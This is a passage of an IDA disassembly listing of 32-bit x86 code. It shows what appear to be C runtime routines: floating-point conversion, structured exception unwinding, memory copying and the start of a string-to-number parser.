; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_410DD4 proc near ; CODE XREF: sub_4028E4+1B�p
; sub_4028E4+44�p ...
var_C = qword ptr -0Ch
var_4 = word ptr -4
var_2 = word ptr -2
push ebp
mov ebp, esp
add esp, 0FFFFFFF4h
fstcw [ebp+var_2]
wait
mov ax, [ebp+var_2]
or ah, 0Ch
mov [ebp+var_4], ax
fldcw [ebp+var_4]
fistp [ebp+var_C]
fldcw [ebp+var_2]
mov eax, dword ptr [ebp+var_C]
mov edx, dword ptr [ebp+var_C+4]
leave
retn
sub_410DD4 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_410DFB(double)
sub_410DFB proc near ; CODE XREF: sub_402930+82�p
var_24 = qword ptr -24h
var_18 = qword ptr -18h
var_8 = qword ptr -8
arg_0 = qword ptr 8
push ebp
mov ebp, esp
push ecx
push ecx
push ebx
push esi
mov esi, 0FFFFh
push esi
push ds:dword_42E168
call sub_414879
fld [ebp+arg_0]
pop ecx
mov ebx, eax
mov eax, dword ptr [ebp+arg_0+6]
pop ecx
push ecx
and ax, 7FF0h
push ecx
cmp ax, 7FF0h
fstp [esp+18h+var_18]
jnz short loc_410E81
call sub_414741
pop ecx
test eax, eax
pop ecx
jle short loc_410E64
cmp eax, 2
jle short loc_410E56
cmp eax, 3
jnz short loc_410E64
fld [ebp+arg_0]
push ebx
push ecx ; int
push ecx
fstp qword ptr [esp]
push 0Ch ; double
call sub_414051
add esp, 10h
jmp short loc_410EC6
; ---------------------------------------------------------------------------
loc_410E56: ; CODE XREF: sub_410DFB+3F�j
push esi
push ebx
call sub_414879
fld [ebp+arg_0]
pop ecx
pop ecx
jmp short loc_410EC6
; ---------------------------------------------------------------------------
loc_410E64: ; CODE XREF: sub_410DFB+3A�j
; sub_410DFB+44�j
fld [ebp+arg_0]
fadd ds:dbl_41C650
push ebx
push ecx ; double
push ecx
fstp qword ptr [esp]
fld [ebp+arg_0]
push ecx
push ecx
fstp [esp+24h+var_24]
push 0Ch
push 8
jmp short loc_410EBE
; ---------------------------------------------------------------------------
loc_410E81: ; CODE XREF: sub_410DFB+2F�j
call sub_414706
fstp [ebp+var_8]
fld [ebp+var_8]
fcomp [ebp+arg_0]
pop ecx
pop ecx
fnstsw ax
sahf
jnz short loc_410EA4
loc_410E96: ; CODE XREF: sub_410DFB+AC�j
push esi
push ebx
call sub_414879
fld [ebp+var_8]
pop ecx
pop ecx
jmp short loc_410EC6
; ---------------------------------------------------------------------------
loc_410EA4: ; CODE XREF: sub_410DFB+99�j
test bl, 20h
jnz short loc_410E96
fld [ebp+var_8]
push ebx ; int
push ecx
push ecx ; double
fstp qword ptr [esp]
fld [ebp+arg_0]
push ecx
push ecx ; double
fstp [esp+24h+var_24]
push 0Ch ; int
push 10h ; int
loc_410EBE: ; CODE XREF: sub_410DFB+84�j
call sub_4140A4
add esp, 1Ch
loc_410EC6: ; CODE XREF: sub_410DFB+59�j
; sub_410DFB+67�j ...
pop esi
pop ebx
leave
retn
sub_410DFB endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_410ECA proc near ; CODE XREF: sub_4151A1+71�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push ebx
push esi
push edi
mov eax, [ebp+arg_4]
add eax, 0Ch
mov [ebp+var_4], eax
mov ebx, large fs:0
mov eax, [ebx]
mov large fs:0, eax
mov eax, [ebp+arg_0]
mov ebx, [ebp+arg_4]
mov esp, [ebx-4]
mov ebp, [ebp+var_4]
jmp eax
sub_410ECA endp
; ---------------------------------------------------------------------------
pop edi
pop esi
pop ebx
leave
retn 8
; =============== S U B R O U T I N E =======================================
sub_410EFE proc near ; CODE XREF: sub_415352+199�p
; sub_415516+3E�p
arg_4 = dword ptr 8
pop eax
pop ecx
xchg eax, [esp-8+arg_4]
jmp eax
sub_410EFE endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_410F05 proc near ; CODE XREF: sub_415352+17F�p
arg_4 = dword ptr 8
pop eax
pop ecx
xchg eax, [esp-8+arg_4]
jmp eax
sub_410F05 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_410F0C proc near ; CODE XREF: sub_4110BE+5C�p
; sub_4151A1:loc_4151D2�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push ecx
push ebx
push esi
push edi
mov eax, large fs:0
mov [ebp+var_8], eax
mov [ebp+var_4], offset loc_410F34
push 0
push [ebp+arg_4]
push [ebp+var_4]
push [ebp+arg_0]
call sub_41AFFE ; RtlUnwind
loc_410F34: ; DATA XREF: sub_410F0C+11�o
mov eax, [ebp+arg_4]
mov eax, [eax+4]
and al, 0FDh
mov ecx, [ebp+arg_4]
mov [ecx+4], eax
mov eax, large fs:0
mov ebx, [ebp+var_8]
mov [ebx], eax
mov large fs:0, ebx
pop edi
pop esi
pop ebx
leave
retn 8
sub_410F0C endp
; ---------------------------------------------------------------------------
loc_410F5B: ; CODE XREF: seg000:0041B15C�j
; seg000:0041B179�j ...
push ebp
mov ebp, esp
sub esp, 4
push ebx
push esi
push edi
cld
mov [ebp-4], eax
xor eax, eax
push eax
push eax
push eax
push dword ptr [ebp-4]
push dword ptr [ebp+14h]
push dword ptr [ebp+10h]
push dword ptr [ebp+0Ch]
push dword ptr [ebp+8]
call sub_414DA6
add esp, 20h
mov [ebp+14h], eax
pop edi
pop esi
pop ebx
mov eax, [ebp+14h]
mov esp, ebp
pop ebp
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_410F91 proc near ; CODE XREF: sub_41521C+73�p
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
sub esp, 14h
mov eax, [ebp+arg_4]
and [ebp+var_14], 0
mov ecx, [ebp+arg_0]
mov [ebp+var_C], eax
mov eax, [ebp+arg_C]
mov [ebp+var_10], offset sub_410FE5
inc eax
mov [ebp+var_8], ecx
mov [ebp+var_4], eax
mov eax, large fs:0
mov [ebp+var_14], eax
lea eax, [ebp+var_14]
mov large fs:0, eax
push [ebp+arg_10]
push ecx
push [ebp+arg_8]
call sub_4155A0
mov ecx, eax
mov eax, [ebp+var_14]
mov large fs:0, eax
mov eax, ecx
leave
retn
sub_410F91 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_410FE5 proc near ; DATA XREF: sub_410F91+16�o
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
cld
mov eax, [ebp+arg_4]
push 0
push eax
push dword ptr [eax+10h]
push dword ptr [eax+8]
push 0
push [ebp+arg_8]
push dword ptr [eax+0Ch]
push [ebp+arg_0]
call sub_414DA6
add esp, 20h
pop ebp
retn
sub_410FE5 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41100A proc near ; CODE XREF: sub_414FE8+25�p
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
push ebp
mov ebp, esp
sub esp, 34h
push ebx
push esi
push edi
and [ebp+var_28], 0
mov [ebp+var_24], offset sub_4110BE
mov eax, [ebp+arg_10]
mov [ebp+var_20], eax
mov eax, [ebp+arg_4]
mov [ebp+var_1C], eax
mov eax, [ebp+arg_14]
mov [ebp+var_18], eax
mov eax, [ebp+arg_18]
mov [ebp+var_14], eax
and [ebp+var_10], 0
and [ebp+var_C], 0
and [ebp+var_8], 0
and [ebp+var_4], 0
mov [ebp+var_10], offset loc_411090
mov [ebp+var_C], esp
mov [ebp+var_8], ebp
mov eax, large fs:0
mov [ebp+var_28], eax
lea eax, [ebp+var_28]
mov large fs:0, eax
mov [ebp+var_34], 1
mov eax, [ebp+arg_0]
mov [ebp+var_30], eax
mov eax, [ebp+arg_8]
mov [ebp+var_2C], eax
lea eax, [ebp+var_30]
push eax
mov eax, [ebp+arg_0]
push dword ptr [eax]
call ds:dword_45F8BC
pop ecx
pop ecx
and [ebp+var_34], 0
loc_411090: ; DATA XREF: sub_41100A+3C�o
cmp [ebp+var_4], 0
jz short loc_4110AD
mov ebx, large fs:0
mov eax, [ebx]
mov ebx, [ebp+var_28]
mov [ebx], eax
mov large fs:0, ebx
jmp short loc_4110B6
; ---------------------------------------------------------------------------
loc_4110AD: ; CODE XREF: sub_41100A+8A�j
mov eax, [ebp+var_28]
mov large fs:0, eax
loc_4110B6: ; CODE XREF: sub_41100A+A1�j
mov eax, [ebp+var_34]
pop edi
pop esi
pop ebx
leave
retn
sub_41100A endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4110BE proc near ; DATA XREF: sub_41100A+D�o
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ebx
push esi
push edi
cld
mov eax, [ebp+arg_0]
mov eax, [eax+4]
and eax, 66h
test eax, eax
jz short loc_4110E1
mov eax, [ebp+arg_4]
mov dword ptr [eax+24h], 1
push 1
pop eax
jmp short loc_41112E
; ---------------------------------------------------------------------------
loc_4110E1: ; CODE XREF: sub_4110BE+12�j
push 1
mov eax, [ebp+arg_4]
push dword ptr [eax+14h]
mov eax, [ebp+arg_4]
push dword ptr [eax+10h]
mov eax, [ebp+arg_4]
push dword ptr [eax+8]
push 0
push [ebp+arg_8]
mov eax, [ebp+arg_4]
push dword ptr [eax+0Ch]
push [ebp+arg_0]
call sub_414DA6
add esp, 20h
mov eax, [ebp+arg_4]
cmp dword ptr [eax+24h], 0
jnz short loc_41111F
push [ebp+arg_0]
push [ebp+arg_4]
call sub_410F0C
loc_41111F: ; CODE XREF: sub_4110BE+54�j
mov ebx, [ebp+arg_4]
mov esp, [ebx+1Ch]
mov ebp, [ebx+20h]
jmp dword ptr [ebx+18h]
; ---------------------------------------------------------------------------
push 1
pop eax
loc_41112E: ; CODE XREF: sub_4110BE+21�j
pop edi
pop esi
pop ebx
pop ebp
retn
sub_4110BE endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_411133 proc near ; CODE XREF: sub_414E41+C6�p
; sub_414FE8+43�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
push ecx
push ebx
push esi
cmp [ebp+arg_4], 0
push edi
mov edi, [ebp+arg_0]
mov esi, [edi+0Ch]
mov ebx, [edi+10h]
mov eax, esi
mov [ebp+arg_0], esi
mov [ebp+var_4], eax
jl short loc_41118A
loc_411151: ; CODE XREF: sub_411133+52�j
cmp esi, 0FFFFFFFFh
jnz short loc_41115B
call sub_415642
loc_41115B: ; CODE XREF: sub_411133+21�j
mov ecx, [ebp+arg_8]
dec esi
lea eax, [esi+esi*4]
cmp [ebx+eax*4+4], ecx
lea eax, [ebx+eax*4]
jge short loc_411170
cmp ecx, [eax+8]
jle short loc_411175
loc_411170: ; CODE XREF: sub_411133+36�j
cmp esi, 0FFFFFFFFh
jnz short loc_411181
loc_411175: ; CODE XREF: sub_411133+3B�j
mov eax, [ebp+arg_0]
dec [ebp+arg_4]
mov [ebp+var_4], eax
mov [ebp+arg_0], esi
loc_411181: ; CODE XREF: sub_411133+40�j
cmp [ebp+arg_4], 0
jge short loc_411151
mov eax, [ebp+var_4]
loc_41118A: ; CODE XREF: sub_411133+1C�j
mov ecx, [ebp+arg_C]
inc esi
mov [ecx], esi
mov ecx, [ebp+arg_10]
mov [ecx], eax
cmp eax, [edi+0Ch]
ja short loc_41119E
cmp esi, eax
jbe short loc_4111A3
loc_41119E: ; CODE XREF: sub_411133+65�j
call sub_415642
loc_4111A3: ; CODE XREF: sub_411133+69�j
lea eax, [esi+esi*4]
pop edi
pop esi
lea eax, [ebx+eax*4]
pop ebx
leave
retn
sub_411133 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4111B0 proc near ; CODE XREF: sub_417B48+5A�p
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ebx
push esi
push edi
push ebp
push 0
push 0
push offset loc_4111C8
push [ebp+arg_0]
call sub_41AFFE ; RtlUnwind
loc_4111C8: ; DATA XREF: sub_4111B0+B�o
pop ebp
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
sub_4111B0 endp
; =============== S U B R O U T I N E =======================================
sub_4111D0 proc near ; DATA XREF: sub_4111F2+A�o
; sub_41125A+9�o
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_C = dword ptr 10h
mov ecx, [esp+arg_0]
test dword ptr [ecx+4], 6
mov eax, 1
jz short locret_4111F1
mov eax, [esp+arg_4]
mov edx, [esp+arg_C]
mov [edx], eax
mov eax, 3
locret_4111F1: ; CODE XREF: sub_4111D0+10�j
retn
sub_4111D0 endp
; =============== S U B R O U T I N E =======================================
sub_4111F2 proc near ; CODE XREF: seg000:004152CF�p
; sub_417B48+67�p ...
var_14 = dword ptr -14h
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push ebx
push esi
push edi
mov eax, [esp+0Ch+arg_0]
push eax
push 0FFFFFFFEh
push offset sub_4111D0
push large dword ptr fs:0
mov large fs:0, esp
loc_41120F: ; CODE XREF: sub_4111F2:loc_41124A�j
mov eax, [esp+1Ch+arg_0]
mov ebx, [eax+8]
mov esi, [eax+0Ch]
cmp esi, 0FFFFFFFFh
jz short loc_41124C
cmp esi, [esp+1Ch+arg_4]
jz short loc_41124C
lea esi, [esi+esi*2]
mov ecx, [ebx+esi*4]
mov [esp+1Ch+var_14], ecx
mov [eax+0Ch], ecx
cmp dword ptr [ebx+esi*4+4], 0
jnz short loc_41124A
push 101h
mov eax, [ebx+esi*4+8]
call sub_411286
call dword ptr [ebx+esi*4+8]
loc_41124A: ; CODE XREF: sub_4111F2+44�j
jmp short loc_41120F
; ---------------------------------------------------------------------------
loc_41124C: ; CODE XREF: sub_4111F2+2A�j
; sub_4111F2+30�j
pop large dword ptr fs:0
add esp, 0Ch
pop edi
pop esi
pop ebx
retn
sub_4111F2 endp
; =============== S U B R O U T I N E =======================================
sub_41125A proc near ; CODE XREF: sub_4152E2+37�p
xor eax, eax
mov ecx, large fs:0
cmp dword ptr [ecx+4], offset sub_4111D0
jnz short locret_41127C
mov edx, [ecx+0Ch]
mov edx, [edx+0Ch]
cmp [ecx+8], edx
jnz short locret_41127C
mov eax, 1
locret_41127C: ; CODE XREF: sub_41125A+10�j
; sub_41125A+1B�j
retn
sub_41125A endp
; =============== S U B R O U T I N E =======================================
sub_41127D proc near ; CODE XREF: sub_4155A0+1E�p
; sub_4155A0+40�p
push ebx
push ecx
mov ebx, offset dword_42E16C
jmp short loc_411290
sub_41127D endp
; =============== S U B R O U T I N E =======================================
sub_411286 proc near ; CODE XREF: sub_4111F2+4F�p
; sub_417B48+78�p
push ebx
push ecx
mov ebx, offset dword_42E16C
mov ecx, [ebp+8]
loc_411290: ; CODE XREF: sub_41127D+7�j
mov [ebx+8], ecx
mov [ebx+4], eax
mov [ebx+0Ch], ebp
pop ecx
pop ebx
retn 4
sub_411286 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_4112A0 proc near ; CODE XREF: sub_402930+5�p
; sub_402AD2+5�p ...
push 0FFFFFFFFh
push eax
mov eax, large fs:0
push eax
mov eax, [esp+0Ch]
mov large fs:0, esp
mov [esp+0Ch], ebp
lea ebp, [esp+0Ch]
push eax
retn
sub_4112A0 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_4112BF proc near ; CODE XREF: sub_402FA7+26�p
; seg000:0041ADD5�p ...
arg_0 = dword ptr 4
push [esp+arg_0]
call sub_410C83
pop ecx
retn
sub_4112BF endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4112D0 proc near ; CODE XREF: sub_403018+3A�p
; sub_41357B+2EE�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push edi
push esi
mov esi, [ebp+arg_4]
mov ecx, [ebp+arg_8]
mov edi, [ebp+arg_0]
mov eax, ecx
mov edx, ecx
add eax, esi
cmp edi, esi
jbe short loc_4112F0
cmp edi, eax
jb loc_411468
loc_4112F0: ; CODE XREF: sub_4112D0+16�j
test edi, 3
jnz short loc_41130C
shr ecx, 2
and edx, 3
cmp ecx, 8
jb short loc_41132C
rep movsd
jmp ds:off_411418[edx*4]
; ---------------------------------------------------------------------------
loc_41130C: ; CODE XREF: sub_4112D0+26�j
mov eax, edi
mov edx, 3
sub ecx, 4
jb short loc_411324
and eax, 3
add ecx, eax
jmp dword ptr ds:loc_41132C+4[eax*4]
; ---------------------------------------------------------------------------
loc_411324: ; CODE XREF: sub_4112D0+46�j
jmp dword ptr ds:loc_411428[ecx*4]
; ---------------------------------------------------------------------------
align 4
loc_41132C: ; CODE XREF: sub_4112D0+31�j
; sub_4112D0+8E�j ...
jmp ds:off_4113AC[ecx*4]
; ---------------------------------------------------------------------------
align 4
dd offset loc_411340
dd offset loc_41136C
dd offset loc_411390
; ---------------------------------------------------------------------------
loc_411340: ; DATA XREF: sub_4112D0+64�o
and edx, ecx
mov al, [esi]
mov [edi], al
mov al, [esi+1]
mov [edi+1], al
mov al, [esi+2]
shr ecx, 2
mov [edi+2], al
add esi, 3
add edi, 3
cmp ecx, 8
jb short loc_41132C
rep movsd
jmp ds:off_411418[edx*4]
; ---------------------------------------------------------------------------
align 4
loc_41136C: ; DATA XREF: sub_4112D0+68�o
and edx, ecx
mov al, [esi]
mov [edi], al
mov al, [esi+1]
shr ecx, 2
mov [edi+1], al
add esi, 2
add edi, 2
cmp ecx, 8
jb short loc_41132C
rep movsd
jmp ds:off_411418[edx*4]
; ---------------------------------------------------------------------------
align 10h
loc_411390: ; DATA XREF: sub_4112D0+6C�o
and edx, ecx
mov al, [esi]
mov [edi], al
inc esi
shr ecx, 2
inc edi
cmp ecx, 8
jb short loc_41132C
rep movsd
jmp ds:off_411418[edx*4]
; ---------------------------------------------------------------------------
align 4
off_4113AC dd offset loc_41140F ; DATA XREF: sub_4112D0:loc_41132C�r
dd offset loc_4113FC
dd offset loc_4113F4
dd offset loc_4113EC
dd offset loc_4113E4
dd offset loc_4113DC
dd offset loc_4113D4
dd offset loc_4113CC
; ---------------------------------------------------------------------------
loc_4113CC: ; CODE XREF: sub_4112D0:loc_41132C�j
; DATA XREF: sub_4112D0+F8�o
mov eax, [esi+ecx*4-1Ch]
mov [edi+ecx*4-1Ch], eax
loc_4113D4: ; CODE XREF: sub_4112D0:loc_41132C�j
; DATA XREF: sub_4112D0+F4�o
mov eax, [esi+ecx*4-18h]
mov [edi+ecx*4-18h], eax
loc_4113DC: ; CODE XREF: sub_4112D0:loc_41132C�j
; DATA XREF: sub_4112D0+F0�o
mov eax, [esi+ecx*4-14h]
mov [edi+ecx*4-14h], eax
loc_4113E4: ; CODE XREF: sub_4112D0:loc_41132C�j
; DATA XREF: sub_4112D0+EC�o
mov eax, [esi+ecx*4-10h]
mov [edi+ecx*4-10h], eax
loc_4113EC: ; CODE XREF: sub_4112D0:loc_41132C�j
; DATA XREF: sub_4112D0+E8�o
mov eax, [esi+ecx*4-0Ch]
mov [edi+ecx*4-0Ch], eax
loc_4113F4: ; CODE XREF: sub_4112D0:loc_41132C�j
; DATA XREF: sub_4112D0+E4�o
mov eax, [esi+ecx*4-8]
mov [edi+ecx*4-8], eax
loc_4113FC: ; CODE XREF: sub_4112D0:loc_41132C�j
; DATA XREF: sub_4112D0+E0�o
mov eax, [esi+ecx*4-4]
mov [edi+ecx*4-4], eax
lea eax, ds:0[ecx*4]
add esi, eax
add edi, eax
loc_41140F: ; CODE XREF: sub_4112D0:loc_41132C�j
; DATA XREF: sub_4112D0:off_4113AC�o
jmp ds:off_411418[edx*4]
; ---------------------------------------------------------------------------
align 4
off_411418 dd offset loc_411428 ; DATA XREF: sub_4112D0+35�r
; sub_4112D0+92�r ...
dd offset loc_411430
dd offset loc_41143C
dd offset loc_411450
; ---------------------------------------------------------------------------
loc_411428: ; CODE XREF: sub_4112D0+35�j
; sub_4112D0+92�j ...
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 10h
loc_411430: ; CODE XREF: sub_4112D0+35�j
; sub_4112D0+92�j ...
mov al, [esi]
mov [edi], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 4
loc_41143C: ; CODE XREF: sub_4112D0+35�j
; sub_4112D0+92�j ...
mov al, [esi]
mov [edi], al
mov al, [esi+1]
mov [edi+1], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 10h
loc_411450: ; CODE XREF: sub_4112D0+35�j
; sub_4112D0+92�j ...
mov al, [esi]
mov [edi], al
mov al, [esi+1]
mov [edi+1], al
mov al, [esi+2]
mov [edi+2], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 4
loc_411468: ; CODE XREF: sub_4112D0+1A�j
lea esi, [ecx+esi-4]
lea edi, [ecx+edi-4]
test edi, 3
jnz short loc_41149C
shr ecx, 2
and edx, 3
cmp ecx, 8
jb short loc_411490
std
rep movsd
cld
jmp ds:off_4115B0[edx*4]
; ---------------------------------------------------------------------------
align 10h
loc_411490: ; CODE XREF: sub_4112D0+1B1�j
; sub_4112D0+208�j ...
neg ecx
jmp ds:off_411560[ecx*4]
; ---------------------------------------------------------------------------
align 4
loc_41149C: ; CODE XREF: sub_4112D0+1A6�j
mov eax, edi
mov edx, 3
cmp ecx, 4
jb short loc_4114B4
and eax, 3
sub ecx, eax
jmp dword ptr ds:loc_4114B4+4[eax*4]
; ---------------------------------------------------------------------------
loc_4114B4: ; CODE XREF: sub_4112D0+1D6�j
; DATA XREF: sub_4112D0+1DD�r
jmp ds:off_4115B0[ecx*4]
; ---------------------------------------------------------------------------
align 4
dd offset loc_4114C8
dd offset loc_4114E8
dd offset loc_411510
; ---------------------------------------------------------------------------
loc_4114C8: ; DATA XREF: sub_4112D0+1EC�o
mov al, [esi+3]
and edx, ecx
mov [edi+3], al
dec esi
shr ecx, 2
dec edi
cmp ecx, 8
jb short loc_411490
std
rep movsd
cld
jmp ds:off_4115B0[edx*4]
; ---------------------------------------------------------------------------
align 4
loc_4114E8: ; DATA XREF: sub_4112D0+1F0�o
mov al, [esi+3]
and edx, ecx
mov [edi+3], al
mov al, [esi+2]
shr ecx, 2
mov [edi+2], al
sub esi, 2
sub edi, 2
cmp ecx, 8
jb short loc_411490
std
rep movsd
cld
jmp ds:off_4115B0[edx*4]
; ---------------------------------------------------------------------------
align 10h
loc_411510: ; DATA XREF: sub_4112D0+1F4�o
mov al, [esi+3]
and edx, ecx
mov [edi+3], al
mov al, [esi+2]
mov [edi+2], al
mov al, [esi+1]
shr ecx, 2
mov [edi+1], al
sub esi, 3
sub edi, 3
cmp ecx, 8
jb loc_411490
std
rep movsd
cld
jmp ds:off_4115B0[edx*4]
; ---------------------------------------------------------------------------
align 4
dd offset loc_411564
dd offset loc_41156C
dd offset loc_411574
dd offset loc_41157C
dd offset loc_411584
dd offset loc_41158C
dd offset loc_411594
off_411560 dd offset loc_4115A7 ; DATA XREF: sub_4112D0+1C2�r
; ---------------------------------------------------------------------------
loc_411564: ; DATA XREF: sub_4112D0+274�o
mov eax, [esi+ecx*4+1Ch]
mov [edi+ecx*4+1Ch], eax
loc_41156C: ; DATA XREF: sub_4112D0+278�o
mov eax, [esi+ecx*4+18h]
mov [edi+ecx*4+18h], eax
loc_411574: ; DATA XREF: sub_4112D0+27C�o
mov eax, [esi+ecx*4+14h]
mov [edi+ecx*4+14h], eax
loc_41157C: ; DATA XREF: sub_4112D0+280�o
mov eax, [esi+ecx*4+10h]
mov [edi+ecx*4+10h], eax
loc_411584: ; DATA XREF: sub_4112D0+284�o
mov eax, [esi+ecx*4+0Ch]
mov [edi+ecx*4+0Ch], eax
loc_41158C: ; DATA XREF: sub_4112D0+288�o
mov eax, [esi+ecx*4+8]
mov [edi+ecx*4+8], eax
loc_411594: ; DATA XREF: sub_4112D0+28C�o
mov eax, [esi+ecx*4+4]
mov [edi+ecx*4+4], eax
lea eax, ds:0[ecx*4]
add esi, eax
add edi, eax
loc_4115A7: ; CODE XREF: sub_4112D0+1C2�j
; DATA XREF: sub_4112D0:off_411560�o
jmp ds:off_4115B0[edx*4]
; ---------------------------------------------------------------------------
align 10h
off_4115B0 dd offset loc_4115C0 ; DATA XREF: sub_4112D0+1B7�r
; sub_4112D0:loc_4114B4�r ...
dd offset loc_4115C8
dd offset loc_4115D8
dd offset loc_4115EC
; ---------------------------------------------------------------------------
loc_4115C0: ; CODE XREF: sub_4112D0+1B7�j
; sub_4112D0:loc_4114B4�j ...
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 4
loc_4115C8: ; CODE XREF: sub_4112D0+1B7�j
; sub_4112D0:loc_4114B4�j ...
mov al, [esi+3]
mov [edi+3], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 4
loc_4115D8: ; CODE XREF: sub_4112D0+1B7�j
; sub_4112D0:loc_4114B4�j ...
mov al, [esi+3]
mov [edi+3], al
mov al, [esi+2]
mov [edi+2], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 4
loc_4115EC: ; CODE XREF: sub_4112D0+1B7�j
; sub_4112D0:loc_4114B4�j ...
mov al, [esi+3]
mov [edi+3], al
mov al, [esi+2]
mov [edi+2], al
mov al, [esi+1]
mov [edi+1], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
sub_4112D0 endp
; =============== S U B R O U T I N E =======================================
sub_411605 proc near ; CODE XREF: sub_40307F+34�p
; sub_40307F+4F�p ...
arg_0 = dword ptr 4
push 1
push [esp+4+arg_0]
call sub_410C21
pop ecx
pop ecx
retn
sub_411605 endp
; =============== S U B R O U T I N E =======================================
sub_411613 proc near ; CODE XREF: sub_411680+4�p
arg_0 = dword ptr 4
push esi
push ds:dword_460EB4
call sub_415698
mov edx, ds:dword_460EB4
pop ecx
mov ecx, ds:dword_460EB0
mov esi, ecx
sub esi, edx
add esi, 4
cmp eax, esi
pop esi
jnb short loc_411672
push edx
call sub_415698
add eax, 10h
push eax
push ds:dword_460EB4
call sub_41237F
add esp, 0Ch
test eax, eax
jnz short loc_411655
retn
; ---------------------------------------------------------------------------
loc_411655: ; CODE XREF: sub_411613+3F�j
mov ecx, ds:dword_460EB0
sub ecx, ds:dword_460EB4
mov ds:dword_460EB4, eax
sar ecx, 2
lea ecx, [eax+ecx*4]
mov ds:dword_460EB0, ecx
loc_411672: ; CODE XREF: sub_411613+23�j
mov eax, [esp+arg_0]
mov [ecx], eax
add ds:dword_460EB0, 4
retn
sub_411613 endp
; =============== S U B R O U T I N E =======================================
sub_411680 proc near ; CODE XREF: seg000:00403186�p
; sub_41AFDE+5�p ...
arg_0 = dword ptr 4
push [esp+arg_0]
call sub_411613
neg eax
sbb eax, eax
pop ecx
neg eax
dec eax
retn
sub_411680 endp
; ---------------------------------------------------------------------------
push 80h
call sub_410C0F
test eax, eax
pop ecx
mov ds:dword_460EB4, eax
jnz short loc_4116B3
push 18h
call sub_412ADE
mov eax, ds:dword_460EB4
pop ecx
loc_4116B3: ; CODE XREF: seg000:004116A4�j
and dword ptr [eax], 0
mov eax, ds:dword_460EB4
mov ds:dword_460EB0, eax
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4116C1 proc near ; CODE XREF: sub_4118C9+E�p
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 0Ch
push ebx
and [ebp+var_8], 0
push esi
push edi
mov edi, [ebp+arg_0]
mov bl, [edi]
lea esi, [edi+1]
mov [ebp+var_4], esi
loc_4116D9: ; CODE XREF: sub_4116C1+46�j
cmp ds:dword_42E39C, 1
jle short loc_4116F1
movzx eax, bl
push 8
push eax
call sub_413446
pop ecx
pop ecx
jmp short loc_411700
; ---------------------------------------------------------------------------
loc_4116F1: ; CODE XREF: sub_4116C1+1F�j
mov ecx, ds:dword_42E190
movzx eax, bl
mov al, [ecx+eax*2]
and eax, 8
loc_411700: ; CODE XREF: sub_4116C1+2E�j
test eax, eax
jz short loc_411709
mov bl, [esi]
inc esi
jmp short loc_4116D9
; ---------------------------------------------------------------------------
loc_411709: ; CODE XREF: sub_4116C1+41�j
cmp bl, 2Dh
